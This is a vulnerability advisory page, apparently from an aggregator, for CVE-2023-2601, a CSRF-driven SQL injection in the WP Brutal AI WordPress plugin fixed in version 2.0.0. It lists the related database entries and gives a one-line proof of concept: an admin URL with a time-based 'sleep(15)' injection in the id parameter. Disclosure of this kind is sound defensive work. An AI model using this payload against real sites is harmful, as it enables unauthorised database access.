WordPress WP Brutal AI Cross Site Request Forgery / SQL Injection

🗓️ 25 Jul 2023 00:00:00Reported by Taurus OmarType

packetstorm🔗 packetstormsecurity.com👁 388 Views

WordPress Plugin WP Brutal AI SQL Injection via CSR

Reporter	Title	Published	Views	Family All 11
CNNVD	WordPress plugin WP Brutal AI SQL注入漏洞	27 Jun 202300:00	–	cnnvd
CVE	CVE-2023-2601	27 Jun 202313:17	–	cve
Cvelist	CVE-2023-2601 WP Brutal AI < 2.0.0 - SQL Injection via CSRF	27 Jun 202313:17	–	cvelist
EUVD	EUVD-2023-34075	3 Oct 202520:07	–	euvd
NVD	CVE-2023-2601	27 Jun 202314:15	–	nvd
Patchstack	WordPress WP Brutal AI Plugin < 2.0.0 is vulnerable to SQL Injection	5 Jun 202300:00	–	patchstack
Prion	Cross site request forgery (csrf)	27 Jun 202314:15	–	prion
Positive Technologies	PT-2023-20421 · WordPress · Wpbrutalai	27 Jun 202300:00	–	ptsecurity
RedhatCVE	CVE-2023-2601	23 May 202502:53	–	redhatcve
Vulnrichment	CVE-2023-2601 WP Brutal AI < 2.0.0 - SQL Injection via CSRF	27 Jun 202313:17	–	vulnrichment

`Tittle:  
WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRF  
  
References:  
CVE-2023-2601  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.  
  
Affects Plugins:  
WP Brutal AI - Fixed in version 2.0.0  
  
Proof of Concept:  
  
When there is a created campaign, access the following link as an admin:  
  
https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29   
  
Classification:  
Type SQLi   
OWASP top 10 A1: Sql Injection (SQLi)  
CWE-89  
  
wpScan:  
https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd  
`

25 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.19.8

EPSS0.00127

SSVC